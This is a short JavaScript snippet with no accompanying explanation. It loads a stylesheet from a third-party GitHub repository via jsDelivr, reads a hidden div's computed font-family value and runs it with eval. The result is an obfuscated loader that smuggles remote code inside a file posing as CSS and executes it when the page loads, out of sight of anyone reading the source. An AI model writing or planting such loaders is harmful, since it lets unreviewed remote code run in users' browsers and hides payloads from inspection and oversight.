(function() {
    var a = document.createElement("link");
    a.rel = "stylesheet";
    a.href = "https://cdn.jsdelivr.net/gh/Browncha023/avo-ultimate@v0.0.3/run.css";
    a.onload = function() {
        var a = b.currentStyle ? b.currentStyle.fontFamily : document.defaultView.getComputedStyle(b, null).fontFamily;
        eval(a.replace(/^["']|\\|["']$/g, ""));
    };
    document.body.appendChild(a);
    var b = document.createElement("div");
    b.id = "run";
    document.body.appendChild(b);
})()
